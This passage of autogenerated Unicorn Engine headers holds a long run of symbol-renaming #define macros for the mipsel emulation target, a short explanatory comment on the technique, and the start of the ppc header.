helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mipsel #define helper_r6_cmp_s_af helper_r6_cmp_s_af_mipsel #define helper_r6_cmp_s_un helper_r6_cmp_s_un_mipsel #define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mipsel #define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mipsel #define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mipsel #define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mipsel #define helper_r6_cmp_s_le helper_r6_cmp_s_le_mipsel #define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mipsel #define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mipsel #define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mipsel #define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mipsel #define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mipsel #define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mipsel #define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mipsel #define helper_r6_cmp_s_sle 
helper_r6_cmp_s_sle_mipsel #define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mipsel #define helper_r6_cmp_s_or helper_r6_cmp_s_or_mipsel #define helper_r6_cmp_s_une helper_r6_cmp_s_une_mipsel #define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mipsel #define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mipsel #define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mipsel #define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mipsel #define no_mmu_map_address no_mmu_map_address_mipsel #define fixed_mmu_map_address fixed_mmu_map_address_mipsel #define r4k_map_address r4k_map_address_mipsel #define cpu_mips_tlb_flush cpu_mips_tlb_flush_mipsel #define sync_c0_status sync_c0_status_mipsel #define cpu_mips_store_status cpu_mips_store_status_mipsel #define cpu_mips_store_cause cpu_mips_store_cause_mipsel #define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mipsel #define mips_cpu_tlb_fill mips_cpu_tlb_fill_mipsel #define cpu_mips_translate_address cpu_mips_translate_address_mipsel #define exception_resume_pc exception_resume_pc_mipsel #define mips_cpu_do_interrupt mips_cpu_do_interrupt_mipsel #define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mipsel #define r4k_invalidate_tlb r4k_invalidate_tlb_mipsel #define do_raise_exception_err do_raise_exception_err_mipsel #define helper_paddsb helper_paddsb_mipsel #define helper_paddusb helper_paddusb_mipsel #define helper_paddsh helper_paddsh_mipsel #define helper_paddush helper_paddush_mipsel #define helper_paddb helper_paddb_mipsel #define helper_paddh helper_paddh_mipsel #define helper_paddw helper_paddw_mipsel #define helper_psubsb helper_psubsb_mipsel #define helper_psubusb helper_psubusb_mipsel #define helper_psubsh helper_psubsh_mipsel #define helper_psubush helper_psubush_mipsel #define helper_psubb helper_psubb_mipsel #define helper_psubh helper_psubh_mipsel #define helper_psubw helper_psubw_mipsel #define helper_pshufh helper_pshufh_mipsel #define helper_packsswh helper_packsswh_mipsel #define helper_packsshb helper_packsshb_mipsel #define helper_packushb helper_packushb_mipsel #define helper_punpcklwd helper_punpcklwd_mipsel #define helper_punpckhwd helper_punpckhwd_mipsel #define helper_punpcklhw helper_punpcklhw_mipsel #define helper_punpckhhw helper_punpckhhw_mipsel #define helper_punpcklbh helper_punpcklbh_mipsel #define helper_punpckhbh helper_punpckhbh_mipsel #define helper_pavgh helper_pavgh_mipsel #define helper_pavgb helper_pavgb_mipsel #define helper_pmaxsh helper_pmaxsh_mipsel #define helper_pminsh helper_pminsh_mipsel #define helper_pmaxub helper_pmaxub_mipsel #define helper_pminub helper_pminub_mipsel #define helper_pcmpeqw helper_pcmpeqw_mipsel #define helper_pcmpgtw helper_pcmpgtw_mipsel #define helper_pcmpeqh helper_pcmpeqh_mipsel #define helper_pcmpgth helper_pcmpgth_mipsel #define helper_pcmpeqb helper_pcmpeqb_mipsel #define helper_pcmpgtb helper_pcmpgtb_mipsel #define helper_psllw helper_psllw_mipsel #define helper_psrlw helper_psrlw_mipsel #define helper_psraw helper_psraw_mipsel #define helper_psllh helper_psllh_mipsel #define helper_psrlh helper_psrlh_mipsel #define helper_psrah helper_psrah_mipsel #define helper_pmullh helper_pmullh_mipsel #define helper_pmulhh helper_pmulhh_mipsel #define helper_pmulhuh helper_pmulhuh_mipsel #define helper_pmaddhw helper_pmaddhw_mipsel #define helper_pasubub helper_pasubub_mipsel #define helper_biadd helper_biadd_mipsel #define helper_pmovmskb helper_pmovmskb_mipsel #define helper_msa_nloc_b helper_msa_nloc_b_mipsel #define helper_msa_nloc_h helper_msa_nloc_h_mipsel #define helper_msa_nloc_w 
helper_msa_nloc_w_mipsel #define helper_msa_nloc_d helper_msa_nloc_d_mipsel #define helper_msa_nlzc_b helper_msa_nlzc_b_mipsel #define helper_msa_nlzc_h helper_msa_nlzc_h_mipsel #define helper_msa_nlzc_w helper_msa_nlzc_w_mipsel #define helper_msa_nlzc_d helper_msa_nlzc_d_mipsel #define helper_msa_pcnt_b helper_msa_pcnt_b_mipsel #define helper_msa_pcnt_h helper_msa_pcnt_h_mipsel #define helper_msa_pcnt_w helper_msa_pcnt_w_mipsel #define helper_msa_pcnt_d helper_msa_pcnt_d_mipsel #define helper_msa_binsl_b helper_msa_binsl_b_mipsel #define helper_msa_binsl_h helper_msa_binsl_h_mipsel #define helper_msa_binsl_w helper_msa_binsl_w_mipsel #define helper_msa_binsl_d helper_msa_binsl_d_mipsel #define helper_msa_binsr_b helper_msa_binsr_b_mipsel #define helper_msa_binsr_h helper_msa_binsr_h_mipsel #define helper_msa_binsr_w helper_msa_binsr_w_mipsel #define helper_msa_binsr_d helper_msa_binsr_d_mipsel #define helper_msa_bmnz_v helper_msa_bmnz_v_mipsel #define helper_msa_bmz_v helper_msa_bmz_v_mipsel #define helper_msa_bsel_v helper_msa_bsel_v_mipsel #define helper_msa_bclr_b helper_msa_bclr_b_mipsel #define helper_msa_bclr_h helper_msa_bclr_h_mipsel #define helper_msa_bclr_w helper_msa_bclr_w_mipsel #define helper_msa_bclr_d helper_msa_bclr_d_mipsel #define helper_msa_bneg_b helper_msa_bneg_b_mipsel #define helper_msa_bneg_h helper_msa_bneg_h_mipsel #define helper_msa_bneg_w helper_msa_bneg_w_mipsel #define helper_msa_bneg_d helper_msa_bneg_d_mipsel #define helper_msa_bset_b helper_msa_bset_b_mipsel #define helper_msa_bset_h helper_msa_bset_h_mipsel #define helper_msa_bset_w helper_msa_bset_w_mipsel #define helper_msa_bset_d helper_msa_bset_d_mipsel #define helper_msa_add_a_b helper_msa_add_a_b_mipsel #define helper_msa_add_a_h helper_msa_add_a_h_mipsel #define helper_msa_add_a_w helper_msa_add_a_w_mipsel #define helper_msa_add_a_d helper_msa_add_a_d_mipsel #define helper_msa_adds_a_b helper_msa_adds_a_b_mipsel #define helper_msa_adds_a_h helper_msa_adds_a_h_mipsel #define helper_msa_adds_a_w helper_msa_adds_a_w_mipsel #define helper_msa_adds_a_d helper_msa_adds_a_d_mipsel #define helper_msa_adds_s_b helper_msa_adds_s_b_mipsel #define helper_msa_adds_s_h helper_msa_adds_s_h_mipsel #define helper_msa_adds_s_w helper_msa_adds_s_w_mipsel #define helper_msa_adds_s_d helper_msa_adds_s_d_mipsel #define helper_msa_adds_u_b helper_msa_adds_u_b_mipsel #define helper_msa_adds_u_h helper_msa_adds_u_h_mipsel #define helper_msa_adds_u_w helper_msa_adds_u_w_mipsel #define helper_msa_adds_u_d helper_msa_adds_u_d_mipsel #define helper_msa_addv_b helper_msa_addv_b_mipsel #define helper_msa_addv_h helper_msa_addv_h_mipsel #define helper_msa_addv_w helper_msa_addv_w_mipsel #define helper_msa_addv_d helper_msa_addv_d_mipsel #define helper_msa_hadd_s_h helper_msa_hadd_s_h_mipsel #define helper_msa_hadd_s_w helper_msa_hadd_s_w_mipsel #define helper_msa_hadd_s_d helper_msa_hadd_s_d_mipsel #define helper_msa_hadd_u_h helper_msa_hadd_u_h_mipsel #define helper_msa_hadd_u_w helper_msa_hadd_u_w_mipsel #define helper_msa_hadd_u_d helper_msa_hadd_u_d_mipsel #define helper_msa_ave_s_b helper_msa_ave_s_b_mipsel #define helper_msa_ave_s_h helper_msa_ave_s_h_mipsel #define helper_msa_ave_s_w helper_msa_ave_s_w_mipsel #define helper_msa_ave_s_d helper_msa_ave_s_d_mipsel #define helper_msa_ave_u_b helper_msa_ave_u_b_mipsel #define helper_msa_ave_u_h helper_msa_ave_u_h_mipsel #define helper_msa_ave_u_w helper_msa_ave_u_w_mipsel #define helper_msa_ave_u_d helper_msa_ave_u_d_mipsel #define helper_msa_aver_s_b 
helper_msa_aver_s_b_mipsel #define helper_msa_aver_s_h helper_msa_aver_s_h_mipsel #define helper_msa_aver_s_w helper_msa_aver_s_w_mipsel #define helper_msa_aver_s_d helper_msa_aver_s_d_mipsel #define helper_msa_aver_u_b helper_msa_aver_u_b_mipsel #define helper_msa_aver_u_h helper_msa_aver_u_h_mipsel #define helper_msa_aver_u_w helper_msa_aver_u_w_mipsel #define helper_msa_aver_u_d helper_msa_aver_u_d_mipsel #define helper_msa_ceq_b helper_msa_ceq_b_mipsel #define helper_msa_ceq_h helper_msa_ceq_h_mipsel #define helper_msa_ceq_w helper_msa_ceq_w_mipsel #define helper_msa_ceq_d helper_msa_ceq_d_mipsel #define helper_msa_cle_s_b helper_msa_cle_s_b_mipsel #define helper_msa_cle_s_h helper_msa_cle_s_h_mipsel #define helper_msa_cle_s_w helper_msa_cle_s_w_mipsel #define helper_msa_cle_s_d helper_msa_cle_s_d_mipsel #define helper_msa_cle_u_b helper_msa_cle_u_b_mipsel #define helper_msa_cle_u_h helper_msa_cle_u_h_mipsel #define helper_msa_cle_u_w helper_msa_cle_u_w_mipsel #define helper_msa_cle_u_d helper_msa_cle_u_d_mipsel #define helper_msa_clt_s_b helper_msa_clt_s_b_mipsel #define helper_msa_clt_s_h helper_msa_clt_s_h_mipsel #define helper_msa_clt_s_w helper_msa_clt_s_w_mipsel #define helper_msa_clt_s_d helper_msa_clt_s_d_mipsel #define helper_msa_clt_u_b helper_msa_clt_u_b_mipsel #define helper_msa_clt_u_h helper_msa_clt_u_h_mipsel #define helper_msa_clt_u_w helper_msa_clt_u_w_mipsel #define helper_msa_clt_u_d helper_msa_clt_u_d_mipsel #define helper_msa_div_s_b helper_msa_div_s_b_mipsel #define helper_msa_div_s_h helper_msa_div_s_h_mipsel #define helper_msa_div_s_w helper_msa_div_s_w_mipsel #define helper_msa_div_s_d helper_msa_div_s_d_mipsel #define helper_msa_div_u_b helper_msa_div_u_b_mipsel #define helper_msa_div_u_h helper_msa_div_u_h_mipsel #define helper_msa_div_u_w helper_msa_div_u_w_mipsel #define helper_msa_div_u_d helper_msa_div_u_d_mipsel #define helper_msa_max_a_b helper_msa_max_a_b_mipsel #define helper_msa_max_a_h helper_msa_max_a_h_mipsel #define helper_msa_max_a_w helper_msa_max_a_w_mipsel #define helper_msa_max_a_d helper_msa_max_a_d_mipsel #define helper_msa_max_s_b helper_msa_max_s_b_mipsel #define helper_msa_max_s_h helper_msa_max_s_h_mipsel #define helper_msa_max_s_w helper_msa_max_s_w_mipsel #define helper_msa_max_s_d helper_msa_max_s_d_mipsel #define helper_msa_max_u_b helper_msa_max_u_b_mipsel #define helper_msa_max_u_h helper_msa_max_u_h_mipsel #define helper_msa_max_u_w helper_msa_max_u_w_mipsel #define helper_msa_max_u_d helper_msa_max_u_d_mipsel #define helper_msa_min_a_b helper_msa_min_a_b_mipsel #define helper_msa_min_a_h helper_msa_min_a_h_mipsel #define helper_msa_min_a_w helper_msa_min_a_w_mipsel #define helper_msa_min_a_d helper_msa_min_a_d_mipsel #define helper_msa_min_s_b helper_msa_min_s_b_mipsel #define helper_msa_min_s_h helper_msa_min_s_h_mipsel #define helper_msa_min_s_w helper_msa_min_s_w_mipsel #define helper_msa_min_s_d helper_msa_min_s_d_mipsel #define helper_msa_min_u_b helper_msa_min_u_b_mipsel #define helper_msa_min_u_h helper_msa_min_u_h_mipsel #define helper_msa_min_u_w helper_msa_min_u_w_mipsel #define helper_msa_min_u_d helper_msa_min_u_d_mipsel #define helper_msa_mod_s_b helper_msa_mod_s_b_mipsel #define helper_msa_mod_s_h helper_msa_mod_s_h_mipsel #define helper_msa_mod_s_w helper_msa_mod_s_w_mipsel #define helper_msa_mod_s_d helper_msa_mod_s_d_mipsel #define helper_msa_mod_u_b helper_msa_mod_u_b_mipsel #define helper_msa_mod_u_h helper_msa_mod_u_h_mipsel #define helper_msa_mod_u_w helper_msa_mod_u_w_mipsel #define helper_msa_mod_u_d 
helper_msa_mod_u_d_mipsel #define helper_msa_asub_s_b helper_msa_asub_s_b_mipsel #define helper_msa_asub_s_h helper_msa_asub_s_h_mipsel #define helper_msa_asub_s_w helper_msa_asub_s_w_mipsel #define helper_msa_asub_s_d helper_msa_asub_s_d_mipsel #define helper_msa_asub_u_b helper_msa_asub_u_b_mipsel #define helper_msa_asub_u_h helper_msa_asub_u_h_mipsel #define helper_msa_asub_u_w helper_msa_asub_u_w_mipsel #define helper_msa_asub_u_d helper_msa_asub_u_d_mipsel #define helper_msa_hsub_s_h helper_msa_hsub_s_h_mipsel #define helper_msa_hsub_s_w helper_msa_hsub_s_w_mipsel #define helper_msa_hsub_s_d helper_msa_hsub_s_d_mipsel #define helper_msa_hsub_u_h helper_msa_hsub_u_h_mipsel #define helper_msa_hsub_u_w helper_msa_hsub_u_w_mipsel #define helper_msa_hsub_u_d helper_msa_hsub_u_d_mipsel #define helper_msa_ilvev_b helper_msa_ilvev_b_mipsel #define helper_msa_ilvev_h helper_msa_ilvev_h_mipsel #define helper_msa_ilvev_w helper_msa_ilvev_w_mipsel #define helper_msa_ilvev_d helper_msa_ilvev_d_mipsel #define helper_msa_ilvod_b helper_msa_ilvod_b_mipsel #define helper_msa_ilvod_h helper_msa_ilvod_h_mipsel #define helper_msa_ilvod_w helper_msa_ilvod_w_mipsel #define helper_msa_ilvod_d helper_msa_ilvod_d_mipsel #define helper_msa_ilvl_b helper_msa_ilvl_b_mipsel #define helper_msa_ilvl_h helper_msa_ilvl_h_mipsel #define helper_msa_ilvl_w helper_msa_ilvl_w_mipsel #define helper_msa_ilvl_d helper_msa_ilvl_d_mipsel #define helper_msa_ilvr_b helper_msa_ilvr_b_mipsel #define helper_msa_ilvr_h helper_msa_ilvr_h_mipsel #define helper_msa_ilvr_w helper_msa_ilvr_w_mipsel #define helper_msa_ilvr_d helper_msa_ilvr_d_mipsel #define helper_msa_and_v helper_msa_and_v_mipsel #define helper_msa_nor_v helper_msa_nor_v_mipsel #define helper_msa_or_v helper_msa_or_v_mipsel #define helper_msa_xor_v helper_msa_xor_v_mipsel #define helper_msa_move_v helper_msa_move_v_mipsel #define helper_msa_pckev_b helper_msa_pckev_b_mipsel #define helper_msa_pckev_h helper_msa_pckev_h_mipsel #define helper_msa_pckev_w helper_msa_pckev_w_mipsel #define helper_msa_pckev_d helper_msa_pckev_d_mipsel #define helper_msa_pckod_b helper_msa_pckod_b_mipsel #define helper_msa_pckod_h helper_msa_pckod_h_mipsel #define helper_msa_pckod_w helper_msa_pckod_w_mipsel #define helper_msa_pckod_d helper_msa_pckod_d_mipsel #define helper_msa_sll_b helper_msa_sll_b_mipsel #define helper_msa_sll_h helper_msa_sll_h_mipsel #define helper_msa_sll_w helper_msa_sll_w_mipsel #define helper_msa_sll_d helper_msa_sll_d_mipsel #define helper_msa_sra_b helper_msa_sra_b_mipsel #define helper_msa_sra_h helper_msa_sra_h_mipsel #define helper_msa_sra_w helper_msa_sra_w_mipsel #define helper_msa_sra_d helper_msa_sra_d_mipsel #define helper_msa_srar_b helper_msa_srar_b_mipsel #define helper_msa_srar_h helper_msa_srar_h_mipsel #define helper_msa_srar_w helper_msa_srar_w_mipsel #define helper_msa_srar_d helper_msa_srar_d_mipsel #define helper_msa_srl_b helper_msa_srl_b_mipsel #define helper_msa_srl_h helper_msa_srl_h_mipsel #define helper_msa_srl_w helper_msa_srl_w_mipsel #define helper_msa_srl_d helper_msa_srl_d_mipsel #define helper_msa_srlr_b helper_msa_srlr_b_mipsel #define helper_msa_srlr_h helper_msa_srlr_h_mipsel #define helper_msa_srlr_w helper_msa_srlr_w_mipsel #define helper_msa_srlr_d helper_msa_srlr_d_mipsel #define helper_msa_andi_b helper_msa_andi_b_mipsel #define helper_msa_ori_b helper_msa_ori_b_mipsel #define helper_msa_nori_b helper_msa_nori_b_mipsel #define helper_msa_xori_b helper_msa_xori_b_mipsel #define helper_msa_bmnzi_b helper_msa_bmnzi_b_mipsel 
#define helper_msa_bmzi_b helper_msa_bmzi_b_mipsel #define helper_msa_bseli_b helper_msa_bseli_b_mipsel #define helper_msa_shf_df helper_msa_shf_df_mipsel #define helper_msa_addvi_df helper_msa_addvi_df_mipsel #define helper_msa_subvi_df helper_msa_subvi_df_mipsel #define helper_msa_ceqi_df helper_msa_ceqi_df_mipsel #define helper_msa_clei_s_df helper_msa_clei_s_df_mipsel #define helper_msa_clei_u_df helper_msa_clei_u_df_mipsel #define helper_msa_clti_s_df helper_msa_clti_s_df_mipsel #define helper_msa_clti_u_df helper_msa_clti_u_df_mipsel #define helper_msa_maxi_s_df helper_msa_maxi_s_df_mipsel #define helper_msa_maxi_u_df helper_msa_maxi_u_df_mipsel #define helper_msa_mini_s_df helper_msa_mini_s_df_mipsel #define helper_msa_mini_u_df helper_msa_mini_u_df_mipsel #define helper_msa_ldi_df helper_msa_ldi_df_mipsel #define helper_msa_slli_df helper_msa_slli_df_mipsel #define helper_msa_srai_df helper_msa_srai_df_mipsel #define helper_msa_srli_df helper_msa_srli_df_mipsel #define helper_msa_bclri_df helper_msa_bclri_df_mipsel #define helper_msa_bseti_df helper_msa_bseti_df_mipsel #define helper_msa_bnegi_df helper_msa_bnegi_df_mipsel #define helper_msa_sat_s_df helper_msa_sat_s_df_mipsel #define helper_msa_sat_u_df helper_msa_sat_u_df_mipsel #define helper_msa_srari_df helper_msa_srari_df_mipsel #define helper_msa_srlri_df helper_msa_srlri_df_mipsel #define helper_msa_binsli_df helper_msa_binsli_df_mipsel #define helper_msa_binsri_df helper_msa_binsri_df_mipsel #define helper_msa_subv_df helper_msa_subv_df_mipsel #define helper_msa_subs_s_df helper_msa_subs_s_df_mipsel #define helper_msa_subs_u_df helper_msa_subs_u_df_mipsel #define helper_msa_subsus_u_df helper_msa_subsus_u_df_mipsel #define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mipsel #define helper_msa_mulv_df helper_msa_mulv_df_mipsel #define helper_msa_dotp_s_df helper_msa_dotp_s_df_mipsel #define helper_msa_dotp_u_df helper_msa_dotp_u_df_mipsel #define helper_msa_mul_q_df helper_msa_mul_q_df_mipsel #define helper_msa_mulr_q_df helper_msa_mulr_q_df_mipsel #define helper_msa_sld_df helper_msa_sld_df_mipsel #define helper_msa_maddv_df helper_msa_maddv_df_mipsel #define helper_msa_msubv_df helper_msa_msubv_df_mipsel #define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mipsel #define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mipsel #define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mipsel #define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mipsel #define helper_msa_binsl_df helper_msa_binsl_df_mipsel #define helper_msa_binsr_df helper_msa_binsr_df_mipsel #define helper_msa_madd_q_df helper_msa_madd_q_df_mipsel #define helper_msa_msub_q_df helper_msa_msub_q_df_mipsel #define helper_msa_maddr_q_df helper_msa_maddr_q_df_mipsel #define helper_msa_msubr_q_df helper_msa_msubr_q_df_mipsel #define helper_msa_splat_df helper_msa_splat_df_mipsel #define helper_msa_vshf_df helper_msa_vshf_df_mipsel #define helper_msa_sldi_df helper_msa_sldi_df_mipsel #define helper_msa_splati_df helper_msa_splati_df_mipsel #define helper_msa_copy_s_b helper_msa_copy_s_b_mipsel #define helper_msa_copy_s_h helper_msa_copy_s_h_mipsel #define helper_msa_copy_s_w helper_msa_copy_s_w_mipsel #define helper_msa_copy_s_d helper_msa_copy_s_d_mipsel #define helper_msa_copy_u_b helper_msa_copy_u_b_mipsel #define helper_msa_copy_u_h helper_msa_copy_u_h_mipsel #define helper_msa_copy_u_w helper_msa_copy_u_w_mipsel #define helper_msa_insert_b helper_msa_insert_b_mipsel #define helper_msa_insert_h helper_msa_insert_h_mipsel #define helper_msa_insert_w 
helper_msa_insert_w_mipsel #define helper_msa_insert_d helper_msa_insert_d_mipsel #define helper_msa_insve_df helper_msa_insve_df_mipsel #define helper_msa_ctcmsa helper_msa_ctcmsa_mipsel #define helper_msa_cfcmsa helper_msa_cfcmsa_mipsel #define helper_msa_fill_df helper_msa_fill_df_mipsel #define helper_msa_fcaf_df helper_msa_fcaf_df_mipsel #define helper_msa_fcun_df helper_msa_fcun_df_mipsel #define helper_msa_fceq_df helper_msa_fceq_df_mipsel #define helper_msa_fcueq_df helper_msa_fcueq_df_mipsel #define helper_msa_fclt_df helper_msa_fclt_df_mipsel #define helper_msa_fcult_df helper_msa_fcult_df_mipsel #define helper_msa_fcle_df helper_msa_fcle_df_mipsel #define helper_msa_fcule_df helper_msa_fcule_df_mipsel #define helper_msa_fsaf_df helper_msa_fsaf_df_mipsel #define helper_msa_fsun_df helper_msa_fsun_df_mipsel #define helper_msa_fseq_df helper_msa_fseq_df_mipsel #define helper_msa_fsueq_df helper_msa_fsueq_df_mipsel #define helper_msa_fslt_df helper_msa_fslt_df_mipsel #define helper_msa_fsult_df helper_msa_fsult_df_mipsel #define helper_msa_fsle_df helper_msa_fsle_df_mipsel #define helper_msa_fsule_df helper_msa_fsule_df_mipsel #define helper_msa_fcor_df helper_msa_fcor_df_mipsel #define helper_msa_fcune_df helper_msa_fcune_df_mipsel #define helper_msa_fcne_df helper_msa_fcne_df_mipsel #define helper_msa_fsor_df helper_msa_fsor_df_mipsel #define helper_msa_fsune_df helper_msa_fsune_df_mipsel #define helper_msa_fsne_df helper_msa_fsne_df_mipsel #define helper_msa_fadd_df helper_msa_fadd_df_mipsel #define helper_msa_fsub_df helper_msa_fsub_df_mipsel #define helper_msa_fmul_df helper_msa_fmul_df_mipsel #define helper_msa_fdiv_df helper_msa_fdiv_df_mipsel #define helper_msa_fmadd_df helper_msa_fmadd_df_mipsel #define helper_msa_fmsub_df helper_msa_fmsub_df_mipsel #define helper_msa_fexp2_df helper_msa_fexp2_df_mipsel #define helper_msa_fexdo_df helper_msa_fexdo_df_mipsel #define helper_msa_ftq_df helper_msa_ftq_df_mipsel #define helper_msa_fmin_df helper_msa_fmin_df_mipsel #define helper_msa_fmin_a_df helper_msa_fmin_a_df_mipsel #define helper_msa_fmax_df helper_msa_fmax_df_mipsel #define helper_msa_fmax_a_df helper_msa_fmax_a_df_mipsel #define helper_msa_fclass_df helper_msa_fclass_df_mipsel #define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mipsel #define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mipsel #define helper_msa_fsqrt_df helper_msa_fsqrt_df_mipsel #define helper_msa_frsqrt_df helper_msa_frsqrt_df_mipsel #define helper_msa_frcp_df helper_msa_frcp_df_mipsel #define helper_msa_frint_df helper_msa_frint_df_mipsel #define helper_msa_flog2_df helper_msa_flog2_df_mipsel #define helper_msa_fexupl_df helper_msa_fexupl_df_mipsel #define helper_msa_fexupr_df helper_msa_fexupr_df_mipsel #define helper_msa_ffql_df helper_msa_ffql_df_mipsel #define helper_msa_ffqr_df helper_msa_ffqr_df_mipsel #define helper_msa_ftint_s_df helper_msa_ftint_s_df_mipsel #define helper_msa_ftint_u_df helper_msa_ftint_u_df_mipsel #define helper_msa_ffint_s_df helper_msa_ffint_s_df_mipsel #define helper_msa_ffint_u_df helper_msa_ffint_u_df_mipsel #define helper_raise_exception_err helper_raise_exception_err_mipsel #define helper_raise_exception helper_raise_exception_mipsel #define helper_raise_exception_debug helper_raise_exception_debug_mipsel #define helper_muls helper_muls_mipsel #define helper_mulsu helper_mulsu_mipsel #define helper_macc helper_macc_mipsel #define helper_macchi helper_macchi_mipsel #define helper_maccu helper_maccu_mipsel #define helper_macchiu helper_macchiu_mipsel #define 
helper_msac helper_msac_mipsel #define helper_msachi helper_msachi_mipsel #define helper_msacu helper_msacu_mipsel #define helper_msachiu helper_msachiu_mipsel #define helper_mulhi helper_mulhi_mipsel #define helper_mulhiu helper_mulhiu_mipsel #define helper_mulshi helper_mulshi_mipsel #define helper_mulshiu helper_mulshiu_mipsel #define helper_dbitswap helper_dbitswap_mipsel #define helper_bitswap helper_bitswap_mipsel #define helper_rotx helper_rotx_mipsel #define helper_ll helper_ll_mipsel #define helper_lld helper_lld_mipsel #define helper_swl helper_swl_mipsel #define helper_swr helper_swr_mipsel #define helper_sdl helper_sdl_mipsel #define helper_sdr helper_sdr_mipsel #define helper_lwm helper_lwm_mipsel #define helper_swm helper_swm_mipsel #define helper_ldm helper_ldm_mipsel #define helper_sdm helper_sdm_mipsel #define helper_fork helper_fork_mipsel #define helper_yield helper_yield_mipsel #define r4k_helper_tlbinv r4k_helper_tlbinv_mipsel #define r4k_helper_tlbinvf r4k_helper_tlbinvf_mipsel #define r4k_helper_tlbwi r4k_helper_tlbwi_mipsel #define r4k_helper_tlbwr r4k_helper_tlbwr_mipsel #define r4k_helper_tlbp r4k_helper_tlbp_mipsel #define r4k_helper_tlbr r4k_helper_tlbr_mipsel #define helper_tlbwi helper_tlbwi_mipsel #define helper_tlbwr helper_tlbwr_mipsel #define helper_tlbp helper_tlbp_mipsel #define helper_tlbr helper_tlbr_mipsel #define helper_tlbinv helper_tlbinv_mipsel #define helper_tlbinvf helper_tlbinvf_mipsel #define helper_ginvt helper_ginvt_mipsel #define helper_di helper_di_mipsel #define helper_ei helper_ei_mipsel #define helper_eret helper_eret_mipsel #define helper_eretnc helper_eretnc_mipsel #define helper_deret helper_deret_mipsel #define helper_rdhwr_cpunum helper_rdhwr_cpunum_mipsel #define helper_rdhwr_synci_step helper_rdhwr_synci_step_mipsel #define helper_rdhwr_cc helper_rdhwr_cc_mipsel #define helper_rdhwr_ccres helper_rdhwr_ccres_mipsel #define helper_rdhwr_performance helper_rdhwr_performance_mipsel #define helper_rdhwr_xnp helper_rdhwr_xnp_mipsel #define helper_pmon helper_pmon_mipsel #define helper_wait helper_wait_mipsel #define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mipsel #define mips_cpu_do_transaction_failed mips_cpu_do_transaction_failed_mipsel #define helper_msa_ld_b helper_msa_ld_b_mipsel #define helper_msa_ld_h helper_msa_ld_h_mipsel #define helper_msa_ld_w helper_msa_ld_w_mipsel #define helper_msa_ld_d helper_msa_ld_d_mipsel #define helper_msa_st_b helper_msa_st_b_mipsel #define helper_msa_st_h helper_msa_st_h_mipsel #define helper_msa_st_w helper_msa_st_w_mipsel #define helper_msa_st_d helper_msa_st_d_mipsel #define helper_cache helper_cache_mipsel #define gen_intermediate_code gen_intermediate_code_mipsel #define mips_tcg_init mips_tcg_init_mipsel #define cpu_mips_realize_env cpu_mips_realize_env_mipsel #define cpu_state_reset cpu_state_reset_mipsel #define restore_state_to_opc restore_state_to_opc_mipsel #define ieee_rm ieee_rm_mipsel #define mips_defs mips_defs_mipsel #define mips_defs_number mips_defs_number_mipsel #define gen_helper_float_class_s gen_helper_float_class_s_mipsel #define gen_helper_float_class_d gen_helper_float_class_d_mipsel #endif 
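/*
 * Illustrative note (editorial addition, not generator output): per-target
 * headers such as mipsel.h above and ppc.h below allow several QEMU targets
 * to be linked into a single Unicorn binary without duplicate-symbol errors.
 * Each header #defines every global symbol to a target-suffixed name before
 * any declaration is parsed (the suffix itself is carried in
 * UNICORN_ARCH_POSTFIX). A minimal sketch of the same renaming technique
 * follows; demo.h, demo_add, and BUILD_MIPSEL are hypothetical names.
 */
#if 0 /* sketch only, excluded from compilation */
/* demo.h -- shared header, compiled once per target */
#ifdef BUILD_MIPSEL               /* hypothetical per-target build flag  */
#define demo_add demo_add_mipsel  /* renames every later use of demo_add */
#endif
int demo_add(int a, int b);       /* mipsel build exports demo_add_mipsel */
#endif
/*
 * Compiled once with BUILD_MIPSEL and once without, the two object files
 * export distinct link-time symbols (demo_add_mipsel vs. demo_add) and can
 * coexist in one library.
 */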
unicorn-2.1.1/qemu/ppc.h000066400000000000000000002573161467524106700151140ustar00rootroot00000000000000/* Autogen header for Unicorn Engine - DO NOT MODIFY */ #ifndef UNICORN_AUTOGEN_ppc_H #define UNICORN_AUTOGEN_ppc_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _ppc #endif #define unicorn_fill_tlb unicorn_fill_tlb_ppc #define reg_read reg_read_ppc #define reg_write reg_write_ppc #define uc_init uc_init_ppc #define uc_add_inline_hook uc_add_inline_hook_ppc #define uc_del_inline_hook uc_del_inline_hook_ppc #define tb_invalidate_phys_range tb_invalidate_phys_range_ppc #define use_idiv_instructions use_idiv_instructions_ppc #define arm_arch arm_arch_ppc #define tb_target_set_jmp_target tb_target_set_jmp_target_ppc #define have_bmi1 have_bmi1_ppc #define have_popcnt have_popcnt_ppc #define have_avx1 have_avx1_ppc #define have_avx2 have_avx2_ppc #define have_isa have_isa_ppc #define have_altivec have_altivec_ppc #define have_vsx have_vsx_ppc #define flush_icache_range flush_icache_range_ppc #define s390_facilities s390_facilities_ppc #define tcg_dump_op tcg_dump_op_ppc #define tcg_dump_ops tcg_dump_ops_ppc #define tcg_gen_and_i64 tcg_gen_and_i64_ppc #define tcg_gen_discard_i64 tcg_gen_discard_i64_ppc #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_ppc #define 